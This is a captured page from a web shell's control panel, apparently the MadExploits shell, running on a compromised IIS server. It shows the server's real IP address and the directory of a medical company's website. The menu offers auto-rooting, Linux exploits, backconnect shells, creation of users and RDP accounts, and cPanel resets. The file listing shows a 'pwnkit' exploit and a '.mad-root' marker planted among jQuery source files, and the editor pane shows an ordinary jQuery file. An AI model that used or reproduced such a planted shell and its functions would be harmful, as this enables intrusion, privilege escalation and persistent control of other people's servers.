Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 18.225.55.210
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
jquery /
src /
manipulation /
[ HOME SHELL ]
Name
Size
Permission
Action
var
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
_evalUrl.js
356
B
-rw-rw-rw-
buildFragment.js
2.4
KB
-rw-rw-rw-
getAll.js
650
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
setGlobalEval.js
381
B
-rw-rw-rw-
support.js
1.01
KB
-rw-rw-rw-
wrapMap.js
798
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wrapMap.js
define( function() { "use strict"; // We have to close these tags to support XHTML (#13200) var wrapMap = { // Support: IE <=9 only option: [ 1, "<select multiple='multiple'>", "</select>" ], // XHTML parsers do not magically insert elements in the // same way that tag soup parsers do. So we cannot shorten // this by omitting <tbody> or other required elements. thead: [ 1, "<table>", "</table>" ], col: [ 2, "<table><colgroup>", "</colgroup></table>" ], tr: [ 2, "<table><tbody>", "</tbody></table>" ], td: [ 3, "<table><tbody><tr>", "</tr></tbody></table>" ], _default: [ 0, "", "" ] }; // Support: IE <=9 only wrapMap.optgroup = wrapMap.option; wrapMap.tbody = wrapMap.tfoot = wrapMap.colgroup = wrapMap.caption = wrapMap.thead; wrapMap.th = wrapMap.td; return wrapMap; } );
Close